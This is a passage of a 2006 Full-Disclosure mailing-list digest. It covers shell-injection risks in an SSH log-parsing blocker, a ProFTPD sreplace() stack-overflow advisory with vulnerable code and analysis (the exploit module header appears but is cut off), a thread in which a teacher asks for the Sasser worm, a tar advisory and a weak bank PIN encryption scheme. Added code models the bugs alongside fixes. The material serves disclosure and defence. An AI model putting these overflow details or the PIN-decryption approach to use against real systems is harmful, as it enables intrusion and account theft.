Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Joshua D. Abraham
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote:

 why not save all that trouble and just use the --limit directive in 
 iptables? (examples on the netfilter mailing-list).

or use denyhosts (denyhosts.sf.net)

--josh
Joshua D. Abraham
Northeastern University
College of Computer and Information Science
www.ccs.neu.edu/home/jabra



Re: [Full-disclosure] SSH brute force blocking tool

2006-11-27 Thread Tavis Ormandy
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote:
 No it can't. Even if it was rm -rf someone placed in, did you not notice 
 my grep statement? Only print items with a decimal. At no given point 
 anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would 
 there be an option for someone to craft anything...

J, I realise this is a difficult issue to grasp, but stick with it. 

Let's say that a fictitious log entry looks like this:

DATE ERROR USERNAME ADDRESS PORT

And let's say you're trying to print column 4 to get the address.

Here's an example:

Monday INVALID foobar 123.123.123.123 1024

You print $4 and get 123.123.123.123, excellent. Now let's try logging in
as "foo bar".

Monday INVALID foo bar 123.123.123.123 1024

What's in $4 now? That's right, attacker controlled data.

 I'll give you addresses if you'd like to take a shot at it.

Sure, send them to the list, there are bound to be some takers.

Thanks, Tavis.

-- 
-
[EMAIL PROTECTED] | finger me for my pgp key.
---


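Tavis's column-shift point, as an added illustration in Python (this is not code from the thread, and the log lines are constructed in the shape of OpenSSH's "Failed password" message rather than taken from anyone's log): a whitespace-column read like `$13` returns whatever a crafted username pushes into that slot, while a parser anchored on the fixed tail sshd appends after the username, with the result validated as an IP address and handed to iptables as one argv element instead of through `| sh`, does not.

```python
import ipaddress
import re
from typing import Optional

# Constructed sample lines in the shape of OpenSSH's "Failed password" entry.
# Line 2 is the "foo bar" login from the thread; line 3 is a username written
# to look like a log address field; line 4 is a valid-user failure, where the
# 13th column is the port; line 5 carries a non-address where the address belongs.
SAMPLE_LOG = """\
Nov 27 15:51:39 host sshd[1234]: Failed password for invalid user foo from 192.0.2.10 port 40001 ssh2
Nov 27 15:51:41 host sshd[1235]: Failed password for invalid user foo bar from 192.0.2.11 port 40002 ssh2
Nov 27 15:51:43 host sshd[1236]: Failed password for invalid user x from 203.0.113.9 port 1 from 192.0.2.12 port 40003 ssh2
Nov 27 15:51:45 host sshd[1237]: Failed password for root from 192.0.2.13 port 40004 ssh2
Nov 27 15:51:47 host sshd[1238]: Failed password for invalid user evil from not-an-address port 40005 ssh2
"""

# Anchored on the fixed tail that sshd appends *after* the attacker-chosen
# username, so spaces or fake "from ... port" text in the username cannot
# move the field we read. The username group is greedy on purpose: it
# swallows everything up to the *last* " from <addr> port <n> ssh2".
FAILED_LOGIN = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>.*)"
    r" from (?P<addr>\S+) port (?P<port>\d+) ssh2$"
)


def naive_column_13(line: str) -> str:
    """What `awk '{print $13}'` yields: the 13th whitespace-separated field,
    or the empty string when the line is shorter than that."""
    fields = line.split()
    return fields[12] if len(fields) >= 13 else ""


def source_address(line: str) -> Optional[str]:
    """Return the validated source address of a failed-login line, or None
    when the line is not a failed login or the address field is not an IP
    address. Only this function's return value should ever reach hosts.deny
    or an iptables argv."""
    m = FAILED_LOGIN.search(line)
    if m is None:
        return None
    try:
        return str(ipaddress.ip_address(m.group("addr")))
    except ValueError:
        return None


def offending_addresses(log_text: str) -> list:
    """Unique validated addresses in first-seen order (the role `sort -ru`
    plays in the thread's pipeline, minus the untrusted input)."""
    seen = []
    for line in log_text.splitlines():
        addr = source_address(line)
        if addr is not None and addr not in seen:
            seen.append(addr)
    return seen


def deny_rule_argv(addr: str, iface: str = "eth0") -> list:
    """Build the iptables command as an argv list for subprocess.run(argv)
    without shell=True: the address travels as one argument and is never
    re-parsed by a shell, which is what `awk ... | sh` gets wrong.
    Raises ValueError if addr is not an IP address."""
    ipaddress.ip_address(addr)
    return ["iptables", "-A", "INPUT", "-s", addr, "-i", iface,
            "-p", "tcp", "--dport", "22", "-j", "REJECT"]


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(f"column 13: {naive_column_13(line)!r:22} "
              f"validated: {source_address(line)!r}")
    for addr in offending_addresses(SAMPLE_LOG):
        print(" ".join(deny_rule_argv(addr)))
```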

[Full-disclosure] Potentially OT: AJAX article

2006-11-27 Thread mike kemp

Dear all,

Please forgive the potentially off topic post, but please find below a link
to a recent article concerning AJAX security I composed for Heise UK / c't,
in the sincere hopes that it proves useful to anyone still even remotely
interested in much hyped Web 2.0 technologies (or DHTML...)

Many thanks.
Michael Kemp (clappymonkey)


Ajax Security: Stronger than Dirt?
A look at the security implications of Ajax

Ajax allows the development of more feature rich, asynchronous applications,
but in doing so opens up new possibilities for attackers. We look at the
relevant security issues and their possible solutions.

http://www.heise-security.co.uk/articles/81264



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Octal

Well if it's an air gapped network then there's no way to get patches unless
you carry them over on a disk.  When I taught a class at a local university
we did a similar experiment on an unpatched air gapped network.

On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:


a douchebag?

I dunno but why the hell aren't your boxes patched to Sasser yet?

-KF


deep fried wrote:
 What am I

 Consultant?
 School Teacher?
 Terrorist?





 On 11/27/06, *K F (lists)* [EMAIL PROTECTED]
 mailto:[EMAIL PROTECTED] wrote:

 Dude... settle the hell down.

 I see little problem with this guy doing this on a closed LAN in a
 lab
 setting. What part of CLOSED LAB did you miss? Its not like he is
 intentionally letting it loose on the entire school LAN.

 -KF

 [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote:
  Chris -
 
  I don't know what to make of your please reply off-list; I'm
 not a member
  comment.
  It's almost as ridiculous as what you are requesting.
 
  If I take your question at face value, you are an INSTRUCTOR,
 not an Admin.
  That means you probably teach an A+ class, maybe an abbreviated
CCNA
  program.
 
  You have NO FUCKING BUSINESS WHATSOEVER even THINKING about
 turning loose a
  dangerous piece of Malware in someone else's network. And it IS
 someone
  else's network; specifically it belongs to the district.
 
  Speak as a network engineer for a large midwestern
 schooldistrict, if you
  did that in MY network, I'd have your job. GOD HELP YOU if it
 turns out
  that you actually ARE a teacher in my district. I don't
 recognize the name,
  but you can bet your ass that every time we have an infection in
 one of our
  schools from now until the stars burn out; that I'll be making a
 point of
  asking who the computer teachers are in that building.
 
  You want to teach these kids a lesson? Write it on the blackboard.
 
  We have enough work to do just keeping up with the kids, without
 an alleged
  professional turning loose a worm in our network.
 
 
  =
  I'm a high school network administration teacher
  looking for a creative means of teaching my students
  the importance of patch management.  I was hoping to
  let a particularly nasty worm loose on a closed lab
  so my students could see what happens during an outbreak,
  but I'm running into a hitch - I can't find a worm that
  would spread quickly enough to be useful.
 
  Does anyone have a copy of Sasser or a similar worm
  that they would be willing to send or link me to?
  Please contact me off-list.  I would be happy to
  verify my identity as a high school teacher off-list
  as I'm sure that is a concern for most anyone who has
  what I am looking for.
 
  Please do not reply on list as I am not currently a member.
  Thank you,
  Chris
  
 
 

  mail2web - Check your email from the web at
  http://mail2web.com/ .
 
 
 
 



 


Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Valdis . Kletnieks
On Mon, 27 Nov 2006 13:31:04 CST, Octal said:
 Well if it's an air gapped network then there's no way to get patches unless
 you carry them over on a disk.  When I taught a class at a local university
 we did a similar experiment on an unpatched air gapped network.

I've seen this done lots of times.  Amazing how often people forget to
wipe the disks after delivering the patches... ;)



[Full-disclosure] ProFTPD 1.3.0 remote stack overflow

2006-11-27 Thread research
Hi all,

Our ProFTPD advisory is below.

Name: ProFTPD remote buffer overflow vulnerability
Vendor:   http://www.proftpd.org
Release date: 27 Nov, 2006
URL:  http://www.gleg.net/proftpd.txt
CVE:  CVE-2006-5815
Author:   Evgeny Legerov [EMAIL PROTECTED]

I. DESCRIPTION

A remotely exploitable stack overflow vulnerability has been found in the
ProFTPD server.
The vulnerability allows a remote authenticated attacker to gain root
privileges.

II. DETAILS

The vulnerability exists in the sreplace() function in src/support.c.
An oversimplified analysis of the vulnerability follows:


char *sreplace(pool *p, char *s, ...) {
  va_list args;
  char *m,*r,*src = s,*cp;
  char **mptr,**rptr;
  char *marr[33],*rarr[33];
  char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
  size_t mlen = 0, rlen = 0, blen;
  int dyn = TRUE;

  cp = buf;
  *cp = '\0';

  memset(marr, '\0', sizeof(marr));
  memset(rarr, '\0', sizeof(rarr));
  blen = strlen(src) + 1;

  va_start(args, s);

  while ((m = va_arg(args, char *)) != NULL && mlen < sizeof(marr)-1) {
char *tmp = NULL;
size_t count = 0;

if ((r = va_arg(args, char *)) == NULL)
  break;

/* Increase the length of the needed buffer by the difference between
 * the given match and replacement strings, multiplied by the number
 * of times the match string occurs in the source string.
 */
tmp = strstr(s, m);
while (tmp) {
  pr_signals_handle();
  count++;
  /* Be sure to increment the pointer returned by strstr(3), to
   * advance past the beginning of the substring for which we are
   * looking.  Otherwise, we just loop endlessly, seeing the same
   * value for tmp over and over.
   */
  tmp += strlen(m);
  tmp = strstr(tmp, m);
}

/* We are only concerned about match/replacement strings that actually
 * occur in the given string.
 */
if (count) {
  blen += count * (strlen(r) - strlen(m));
  marr[mlen] = m;
  rarr[mlen++] = r;
}
  }

  va_end(args);

  /* Try to handle large buffer situations (i.e. escaping of
 * PR_TUNABLE_PATH_MAX
   * (2048) correctly, but do not allow very big buffer sizes, that may
   * be dangerous (BUFSIZ may be defined in stdio.h) in some library
   * functions.
   */
#ifndef BUFSIZ
# define BUFSIZ 8192
#endif
  if (blen < BUFSIZ)
[1]  cp = pbuf = (char *) pcalloc(p, ++blen);

  if (!pbuf) {
[2]  cp = pbuf = buf;
dyn = FALSE;
blen = sizeof(buf);
  }

  while (*src) {
for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
  mlen = strlen(*mptr);
  rlen = strlen(*rptr);

  if (strncmp(src, *mptr, mlen) == 0) {
[3] sstrncpy(cp, *rptr, blen - strlen(pbuf));
        if (((cp + rlen) - pbuf + 1) > blen) {
          pr_log_pri(PR_LOG_ERR,
            "WARNING: attempt to overflow internal ProFTPD buffers");
  cp = pbuf + blen - 1;
  goto done;

} else {
  cp += rlen;
}

src += mlen;
break;
  }
}
if (!*mptr) {
[4]   if ((cp - pbuf + 1) > blen) {
        pr_log_pri(PR_LOG_ERR,
          "WARNING: attempt to overflow internal ProFTPD buffers");
 cp = pbuf + blen - 1;
  }
  *cp++ = *src++;
}
  }

 done:
  *cp = '\0';

  if (dyn)
return pbuf;

  return pstrdup(p, buf);
}


First of all, the value of 'blen' is controlled by us: if we set it to a
value which is less than BUFSIZ (see [1]) we can trigger a heap overflow,
otherwise we will be able to trigger a stack overflow (see [2]).

Because of the miscalculation on line [4], we can overwrite the last (NULL)
byte of 'pbuf', so that 'strlen(pbuf)' will be greater than 'blen'.
The code on line [3] will then overwrite the 'pbuf' buffer with our data,
because the 'sstrncpy' function copies happily when its third argument is
negative.

At least two vectors exist for this vulnerability:
1. MKD command
2. pr_display_file

The included trivial proof of concept exploit code uses the second attack
vector.
Write access is necessary for this exploit to work.

III. VENDOR RESPONSE

The vendor has released 1.3.0a version which addresses this issue.

For more info about the newest version of ProFTPD and possible workarounds
please visit:
http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858

IV. CREDIT

The vulnerability has been discovered by Evgeny Legerov.

V. EXPLOIT

# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# 

Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Valdis . Kletnieks
On Mon, 27 Nov 2006 17:16:31 EST, Rick said:
 
 On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:
 
  You would have us believe that the guy is clued enough to run a closed
  lab without screwing up (and there's *lots* of ways to screw up, starting
  with forgetting to wipe the drives afterwards, forgetting to disable a
  wireless card, forgetting to not plug any of the boxes into the normal net,
  forgetting to...).
 
 so when you go to mcdonalds and hand over your $5 for your MCbig meal, do 
 you consider the repercussions of supporting an industry which pays low 
 wages, is under-staffed, and promotes world-hunger by using enough grain 
 to feed a continent, etc...?

WTF does that have to do with the topic?  Unless you want to make the point
that often, the McDonald's staff fails to use a level of food-preparation
hygiene that matches the computer-security hygiene requirements to work with
known malware?

The average McDonald's doesn't have biohazard signs (whether they should is a
different rant) - and even the average doctor's office that *does* have
biohazard signs for used hypodermic needles and the like usually has special
training/procedures for dealing with the stuff.

And labs that do active research on biohazards have even stricter protocols.

(Make note, there *have* been screw-ups in the protocols at places that handle
stuff like Ebola and smallpox - Preston's The Hot Zone has a nice story of a
dead monkey with nothing but a plastic garbage bag keeping the nasties in, and
a few years ago, there was a small to-do in one of the labs in England that had
some smallpox...)

 And yet he's not clued enough to know how to find a copy of Sasser by 
 himself.

 so what?
 do *you* know where to find a copy?
Yes.
 did you always?
Yes.
 have you always been able to configure a network to talk via EIGRP?
No, because when I first got on the net, RFC1058 was still 4 years in the
future. So it wasn't always possible, because the option didn't always
exist.

  There are a lot of people who are of the opinion that if you have to ask
  where to find a copy of Sasser, you're not clued enough to be trusted with
  a copy.
 
 perhaps the next time you need a doctor, the one you find will laugh at 
 you with the same sense of elitism you demonstrate.

Did I say I was one of the lot of people? Did you notice that I was
replying *in the context of KF's comments* saying It's cool because it's
in a closed lab?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Rick

On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote:

 You would have us believe that the guy is clued enough to run a closed
 lab without screwing up (and there's *lots* of ways to screw up, starting
 with forgetting to wipe the drives afterwards, forgetting to disable a
 wireless card, forgetting to not plug any of the boxes into the normal net,
 forgetting to...).

so when you go to mcdonalds and hand over your $5 for your MCbig meal, do 
you consider the repercussions of supporting an industry which pays low 
wages, is under-staffed, and promotes world-hunger by using enough grain 
to feed a continent, etc...?

 And yet he's not clued enough to know how to find a copy of Sasser by 
 himself.

so what?
do *you* know where to find a copy?
did you always?
have you always been able to configure a network to talk via EIGRP?

 There are a lot of people who are of the opinion that if you have to ask
 where to find a copy of Sasser, you're not clued enough to be trusted with
 a copy.

perhaps the next time you need a doctor, the one you find will laugh at 
you with the same sense of elitism you demonstrate.


Rick



[Full-disclosure] ProFTPD remote buffer overflow vulnerability

2006-11-27 Thread research
Hi all,

Name: ProFTPD remote buffer overflow vulnerability
Vendor:   http://www.proftpd.org
Release date: 27 Nov, 2006
URL:  http://www.gleg.net/proftpd.txt
CVE:  CVE-2006-5815
Author:   Evgeny Legerov [EMAIL PROTECTED]

I. DESCRIPTION

A remotely exploitable stack overflow vulnerability has been found in ProFTPD
server.
The vulnerability allows a remote authenticated attacker to gain root
privileges.

II. DETAILS

The vulnerability exists in the sreplace() function from src/support.c.
An oversimplified analysis of the vulnerability follows:


char *sreplace(pool *p, char *s, ...) {
  va_list args;
  char *m,*r,*src = s,*cp;
  char **mptr,**rptr;
  char *marr[33],*rarr[33];
  char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
  size_t mlen = 0, rlen = 0, blen;
  int dyn = TRUE;

  cp = buf;
  *cp = '\0';

  memset(marr, '\0', sizeof(marr));
  memset(rarr, '\0', sizeof(rarr));
  blen = strlen(src) + 1;

  va_start(args, s);

  while ((m = va_arg(args, char *)) != NULL && mlen < sizeof(marr)-1) {
    char *tmp = NULL;
    size_t count = 0;

    if ((r = va_arg(args, char *)) == NULL)
      break;

    /* Increase the length of the needed buffer by the difference between
     * the given match and replacement strings, multiplied by the number
     * of times the match string occurs in the source string.
     */
    tmp = strstr(s, m);
    while (tmp) {
      pr_signals_handle();
      count++;
      /* Be sure to increment the pointer returned by strstr(3), to
       * advance past the beginning of the substring for which we are
       * looking.  Otherwise, we just loop endlessly, seeing the same
       * value for tmp over and over.
       */
      tmp += strlen(m);
      tmp = strstr(tmp, m);
    }

    /* We are only concerned about match/replacement strings that actually
     * occur in the given string.
     */
    if (count) {
      blen += count * (strlen(r) - strlen(m));
      marr[mlen] = m;
      rarr[mlen++] = r;
    }
  }

  va_end(args);

  /* Try to handle large buffer situations (i.e. escaping of
   * PR_TUNABLE_PATH_MAX (2048)) correctly, but do not allow very big
   * buffer sizes, that may be dangerous (BUFSIZ may be defined in
   * stdio.h) in some library functions.
   */
#ifndef BUFSIZ
# define BUFSIZ 8192
#endif
  if (blen < BUFSIZ)
[1] cp = pbuf = (char *) pcalloc(p, ++blen);

  if (!pbuf) {
[2] cp = pbuf = buf;
    dyn = FALSE;
    blen = sizeof(buf);
  }

  while (*src) {
    for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
      mlen = strlen(*mptr);
      rlen = strlen(*rptr);

      if (strncmp(src, *mptr, mlen) == 0) {
[3]     sstrncpy(cp, *rptr, blen - strlen(pbuf));
        if (((cp + rlen) - pbuf + 1) > blen) {
          pr_log_pri(PR_LOG_ERR,
            "WARNING: attempt to overflow internal ProFTPD buffers");
          cp = pbuf + blen - 1;
          goto done;

        } else {
          cp += rlen;
        }

        src += mlen;
        break;
      }
    }
    if (!*mptr) {
[4]   if ((cp - pbuf + 1) > blen) {
        pr_log_pri(PR_LOG_ERR,
          "WARNING: attempt to overflow internal ProFTPD buffers");
        cp = pbuf + blen - 1;
      }
      *cp++ = *src++;
    }
  }

 done:
  *cp = '\0';

  if (dyn)
    return pbuf;

  return pstrdup(p, buf);
}


First of all, the value of 'blen' is controlled by us: if we set it to a
value less than BUFSIZ (see [1]) we can trigger a heap overflow, otherwise
we will be able to trigger a stack overflow (see [2]).

Because of the miscalculation on line [4], we can overwrite the last (NUL)
byte of 'pbuf', so that 'strlen(pbuf)' becomes greater than 'blen'.
The code on line [3] will then overwrite the 'pbuf' buffer with our data,
because 'sstrncpy' copies happily when its third argument is negative (the
size_t difference wraps around to a huge value).
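The length arithmetic described in the analysis above (in both copies of this advisory), as an added C model that is neither ProFTPD's code nor part of the advisory: the check at [4] lets the byte-copy loop consume the terminator slot, after which the strlen()-based size at [3] wraps to a huge size_t; a hardened variant of the same check is shown beside it. The buffer size, the guard region and the sample strings are constructed for the model, which keeps every access inside its own backing array.

```c
/* Added model of the length arithmetic in sreplace(); not ProFTPD code.
 * The check at [4] rejects a write only when cp - pbuf + 1 > blen, so the
 * byte reserved for the NUL terminator can be consumed. Once 'pbuf' is
 * unterminated, strlen(pbuf) runs on into whatever follows the buffer and
 * 'blen - strlen(pbuf)' at [3] wraps around to a huge size_t.
 * Every access here stays inside 'backing', so the model is safe to run. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BLEN     8   /* constructed logical buffer size, the role of 'blen' */
#define BACKING 24   /* physical storage: BLEN bytes plus a guard region    */

struct fill_result {
    size_t cursor;     /* cp - pbuf after the byte-copy loop              */
    size_t remaining;  /* size argument the code would hand to sstrncpy() */
};

/* First BLEN bytes zeroed like pcalloc(); the guard region is filled with
 * non-NUL bytes and ends in one NUL, standing in for adjacent memory. */
static void init_backing(char *backing) {
    memset(backing, '\0', BLEN);
    memset(backing + BLEN, 'G', BACKING - BLEN - 1);
    backing[BACKING - 1] = '\0';
}

/* Copies 'src' byte by byte as the non-match branch of sreplace() does.
 * hardened == 0 reproduces the original check at [4] and the strlen()-based
 * size from [3]; hardened != 0 reserves the terminator slot and derives
 * the remaining space from the cursor instead of from strlen(). */
struct fill_result fill(char *backing, const char *src, int hardened) {
    char *pbuf = backing, *cp = pbuf;
    size_t blen = BLEN;
    struct fill_result r;

    init_backing(backing);
    while (*src) {
        if (hardened) {
            if ((size_t)(cp - pbuf) + 1 >= blen)     /* full: keep room for NUL */
                break;
        } else if ((size_t)(cp - pbuf + 1) > blen) { /* original: off by one   */
            cp = pbuf + blen - 1;
        }
        *cp++ = *src++;
    }
    r.cursor = (size_t)(cp - pbuf);
    if (hardened) {
        *cp = '\0';
        r.remaining = blen - r.cursor;          /* never underflows         */
    } else {
        r.remaining = blen - strlen(pbuf);      /* wraps once unterminated  */
    }
    return r;
}

/* Convenience wrapper: the size [3] would pass for a given input. */
size_t remaining_for(const char *src, int hardened) {
    char backing[BACKING];
    return fill(backing, src, hardened).remaining;
}

/* Replays the copy at [3] with the computed size, clipped to the model's
 * physical storage, and counts guard bytes overwritten past the logical
 * buffer. 'repl' must not contain 'G' so the count is unambiguous. */
size_t guard_bytes_clobbered(const char *src, const char *repl, int hardened) {
    char backing[BACKING];
    struct fill_result r = fill(backing, src, hardened);
    size_t room = BACKING - r.cursor;
    size_t n = r.remaining < room ? r.remaining : room;
    size_t len = strlen(repl), clobbered = 0, i;

    if (n == 0)
        return 0;
    if (len > n - 1)                   /* sstrncpy(): n - 1 bytes plus NUL */
        len = n - 1;
    memcpy(backing + r.cursor, repl, len);
    backing[r.cursor + len] = '\0';
    for (i = BLEN; i < BACKING - 1; i++)
        if (backing[i] != 'G')
            clobbered++;
    return clobbered;
}

int main(void) {
    /* Constructed inputs: 7 bytes fit, 8 bytes consume the terminator. */
    printf("7 bytes, original: remaining=%zu clobbered=%zu\n",
           remaining_for("AAAAAAA", 0),
           guard_bytes_clobbered("AAAAAAA", "0123456789ab", 0));
    printf("8 bytes, original: remaining=%zu clobbered=%zu\n",
           remaining_for("AAAAAAAA", 0),
           guard_bytes_clobbered("AAAAAAAA", "0123456789ab", 0));
    printf("8 bytes, hardened: remaining=%zu clobbered=%zu\n",
           remaining_for("AAAAAAAA", 1),
           guard_bytes_clobbered("AAAAAAAA", "0123456789ab", 1));
    return 0;
}
```

The eighth byte is the exact boundary: one byte fewer leaves a correct terminator and a remaining size of 1, one byte more makes the original arithmetic wrap and the replayed copy spill into the guard region.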

At least two vectors exist for this vulnerability:
1. MKD command
2. pr_display_file

The included proof of concept exploit code uses the second attack vector.
Write access is necessary for this exploit to work.

III. VENDOR RESPONSE

The vendor has released 1.3.0a version which addresses this issue.

For more info about the newest version of ProFTPD and possible workarounds
please visit:
http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858

IV. CREDIT

The vulnerability has been discovered by Evgeny Legerov.

V. EXPLOIT

# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR 

[Full-disclosure] [USN-385-1] tar vulnerability

2006-11-27 Thread Kees Cook
=== 
Ubuntu Security Notice USN-385-1  November 27, 2006
tar vulnerability
CVE-2006-6097
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  tar  1.15.1-2ubuntu0.2

Ubuntu 6.06 LTS:
  tar  1.15.1-2ubuntu2.1

Ubuntu 6.10:
  tar  1.15.91-2ubuntu0.3

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Teemu Salmela discovered that tar still handled the deprecated 
GNUTYPE_NAMES record type.  This record type could be used to create 
symlinks that would be followed while unpacking a tar archive.  If a 
user or an automated system were tricked into unpacking a specially 
crafted tar file, arbitrary files could be overwritten with user 
privileges.



Re: [Full-disclosure] Sasser or other nasty worm needed

2006-11-27 Thread Peter Dawson

I doubt schools have CLOSED LAB. I would like to know where the budget comes
from, for this type of network. If so , then every school district board
needs one.. :)-






On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote:


Dude... settle the hell down.

I see little problem with this guy doing this on a closed LAN in a lab
setting. What part of CLOSED LAB did you miss? Its not like he is
intentionally letting it loose on the entire school LAN.

-KF

[EMAIL PROTECTED] wrote:
 Chris -

 I don't know what to make of your "please reply off-list; I'm not a
 member" comment.
 It's almost as ridiculous as what you are requesting.

 If I take your question at face value, you are an INSTRUCTOR, not an
 Admin. That means you probably teach an A+ class, maybe an abbreviated
 CCNA program.

 You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning
 loose a dangerous piece of Malware in someone else's network. And it IS
 someone else's network; specifically it belongs to the district.

 Speaking as a network engineer for a large midwestern school district,
 if you did that in MY network, I'd have your job. GOD HELP YOU if it
 turns out that you actually ARE a teacher in my district. I don't
 recognize the name, but you can bet your ass that every time we have an
 infection in one of our schools from now until the stars burn out, I'll
 be making a point of asking who the computer teachers are in that
 building.

 You want to teach these kids a lesson? Write it on the blackboard.

 We have enough work to do just keeping up with the kids, without an
 alleged professional turning loose a worm in our network.


 =
 I'm a high school network administration teacher
 looking for a creative means of teaching my students
 the importance of patch management.  I was hoping to
 let a particularly nasty worm loose on a closed lab
 so my students could see what happens during an outbreak,
 but I'm running into a hitch - I can't find a worm that
 would spread quickly enough to be useful.

 Does anyone have a copy of Sasser or a similar worm
 that they would be willing to send or link me to?
 Please contact me off-list.  I would be happy to
 verify my identity as a high school teacher off-list
 as I'm sure that is a concern for most anyone who has
 what I am looking for.

 Please do not reply on list as I am not currently a member.
 Thank you,
 Chris
 

 



Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards andPhishing Banks (fwd)

2006-11-27 Thread Debasis Mohanty
-Original Message-
From: Gadi Evron [mailto:[EMAIL PROTECTED] 
Sent: Monday, November 27, 2006 2:35 PM
To: Debasis Mohanty
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Defeating Image-Based Virtual Keyboards
andPhishing Banks (fwd)

On Mon, 27 Nov 2006, Debasis Mohanty wrote:
 More than a year Old (3rd August, 2005) -
 
 Defeating CITI-BANK Virtual Keyboard Protection
 http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0142.html

 http://hackingspirits.com/vuln-rnd/Defeat-CitiBank-VK.zip

 http://xforce.iss.net/xforce/xfdb/21727

- I hear buffer overflows were invented quite a few years back, too. :)

- That makes most new bof's irrelevant!

-   Gadi.

Nah !! They have just become so common to hear or read ;)

Btw - The last post was not meant to get into some kind of argument but to
point out a different method to defeat such mechanisms.


 
 
 Regards,
 -d
 
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Gadi 
 Evron
 Sent: Sunday, November 26, 2006 12:18 PM
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Defeating Image-Based Virtual Keyboards 
 andPhishing Banks (fwd)
 
 Copied from a post by Noam Rathaus on the SecuriTeam Blogs, following
 up a post by HispaSec. This is about breaking virtual keyboard
 implementations, and the encryption some of them use (most of them
 send the data in clear text with the image). HispaSec was a reference by
 which we found the banks' site as one using a virtual keyboard.
 
 http://blogs.securiteam.com/index.php/archives/678
 
 http://hispasec.com/laboratorio/cajamurcia_en.htm
 
   Gadi.
 
 Quoting:
 Recently, I stumbled upon a post by HispaSec showing off a screen shot 
 trojan (http://hispasec.com/laboratorio/cajamurcia_en.htm) which 
 nicely showed how a trojan horse can, utilizing a key stroke capture 
 and screenshot capture, grab a user's PIN number, fairly easily, and 
 wondered why are they taking this approach when the PIN numbers can be 
 easily retrieved by sniffing the data sent by the user to the banking 
 site, even though they are encrypted.
 
 Image based keyboard (or virtual keyboards) were invented to make life 
 harder for banking or phishing trojan horses (specifically key-stroke 
 loggers or key loggers), some even suggested they be used specifically 
 to avoid these trojan horses. The bad guys adapted to this technology 
 and escalated. Now the trojan horses take screenshots of where the 
 mouse pointer is to determine what number they clicked on. Thing is, 
 it is often unnecessary as in most implementations of this technique 
 that we looked into (meaning, not all) it was flawed.
 
 Instead of sending the remote image and waiting for the key-stroke 
 information to be sent back to the server (the technique which the 
 screenshots for pointer location on-click described above was used) 
 some banks send the PIN number in cleartext, while others encrypt 
 them, one such example is cajamurcia. Even when the encryption is 
 used, banks tend to implement it badly making it easy to recover the 
 PIN number from the encrypted form.
 
 I investigated a bit more on how cajamurcia handles such PIN strokes 
 (with virtual keyboards) and I noticed something strange, they take 
 the timestamp of their server (cajamurcia) and send it to you - this 
 already posses a security problem - and this timestamp is then used to 
 encrypt the PIN number you entered.
 
 This would have been a good idea if the timestamp was not sent back to 
 the server, making it hard or semi-hard to guess the timestamp used to 
 encrypt the data, but at the same time making it harder for the server 
 to know what timestamp was provided to the client (unless they store 
 it inside their session information). Anyhow, as it is sent back to 
 the server, we have everything we need to decrypt the data (PIN number).
 
 PoC:
 
 A request to the server would look like:
 
 OPERACION=0002 CAJA=2043 CAMINO=2043 PGDESTI=CORP BROKER=SI 
 VRS=001 PAN=2043123456 SELLO=16100616012569 CL=1161006956 
 PINV3=si PANA=2043 PANB=123456 PIN=BBCB6E341C56C6B2 IDIOMA=01
 
